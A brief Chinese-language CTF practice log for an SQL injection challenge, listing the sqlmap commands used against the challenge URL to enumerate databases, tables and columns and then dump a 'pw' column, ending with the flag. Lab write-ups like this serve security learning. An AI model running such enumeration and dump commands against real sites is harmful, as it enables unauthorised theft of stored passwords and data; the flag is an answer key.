做题记录(这道题考察sql注入用到了sqlmap)
1.来到题目链接(提示请输入ID,然后尝试绕过)
2.在kali中使用sqlmap,在终端输入/usr/share/sqlmap 进入sqlmap,接下来爆数据库
python sqlmap.py -u "http://61.147.171.105:59892/index.php?id=1" -dbs
3.得到数据库名
4.接下来爆表名(只需要修改后面的就可)
python sqlmap.py -u "http://61.147.171.105:59892/index.php?id=1" -D cyber --tables
5.接下来爆字段
python sqlmap.py -u "http://61.147.171.105:59892/index.php?id=1" -D cyber -T cyber --columns
6.选择pw字段就可以看到里面的信息(flag)
python sqlmap.py -u "http://61.147.171.105:59892/index.php?id=1" -D cyber -T cyber -C pw -dump
cyberpeace{9934cf86dfe743c229c10d38da957f6d}
